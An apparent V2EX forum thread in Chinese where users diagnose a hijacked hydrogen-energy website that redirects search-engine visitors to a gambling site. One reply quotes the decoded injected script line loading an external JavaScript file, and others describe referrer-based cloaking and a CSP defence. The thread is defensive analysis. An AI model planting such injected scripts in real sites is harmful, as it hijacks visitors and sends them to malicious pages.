这个网站是怎么被劫持的?

2018-12-31 17:56:24 +08:00
 supperxin

百度搜素“氢能源”,出现的“中国氢能源网”,地址是:www.china-hydrogen.org

但是点下去却跳转到某博彩网。

看了下百度的搜索地址为

https://www.baidu.com/link?url=p7cFgSeqnDkVcG7w7KtQSmEPsIjaYXZW7eF8CnBAc_bqPHdGxO6UFFSErEyhHuBC&wd=

如果把 querystring 的 wd 去掉,就可以正常停留在网站内了,看起来应该是网站内被挂了 js 检查 wd 这个参数。

接下来要如何检查呢?

3715 次点击
所在节点    程序员
10 条回复
gam2046
2018-12-31 18:04:57 +08:00
http://www.china-hydrogen.org/ 查看 HTML,第 10 行内容,解码后内容为:

window["document"]["write"]('<script type="text/javascript" src="https://www.cpdas8.com/dd.js"></script>');

而加入的该 js 很短,该 JS 内容的倒数第二行将网页进行了跳转。
luminous
2018-12-31 18:20:42 +08:00
我也见到过这种被黑的站 只有从搜索引擎点进去才跳转菠菜站 黑产真是啥操作都有
abux1024
2018-12-31 18:21:49 +08:00
这种代码是运营商植入的吗
mytsing520
2018-12-31 21:56:16 +08:00
@abux1024 是被黑了,不是植入。这种植入对运营商半点好处都没有,相反还会带来巨大风险
zxq2233
2019-01-01 09:40:50 +08:00
小伙子浏览器没装 Adblock 吧
weipt
2019-01-01 12:03:34 +08:00
我的网站刚刚有起色的时候被种码,你可以看看你的 webconfig 文件,里面加了如果是各种搜索引擎来的直接跳转到他的域名上。
laoyuan
2019-01-01 18:08:37 +08:00
因为站长、管理员是不会通过搜索引擎来访问自家网站的
zy65334
2019-01-01 21:41:18 +08:00
@gam2046 看了下第 10 行,不知这种是怎么解码?在线给一个链接?
zy65334
2019-01-01 21:42:54 +08:00
@gam2046 已经找到解码地方了
gam2046
2019-01-01 22:34:27 +08:00
不知道这个网站是否就是你的。这个时候,一方面考验代码的严谨性,另一方面有个比较简单的方法可以,较为的简单的阻止这种代码执行,即使不幸被挂马,也不会影响用户。

在服务端返回的时候(有前置反向代理,则可以在外层代理上设置),加上相对严格的 CSP 即可,比如可以运用这样的策略

"script-src 'self' 'unsafe-inline'; object-src 'self'

eval 函数会被直接禁用,而且浏览器只会加载同源的资源,其他的资源都会被阻止。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/522744

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX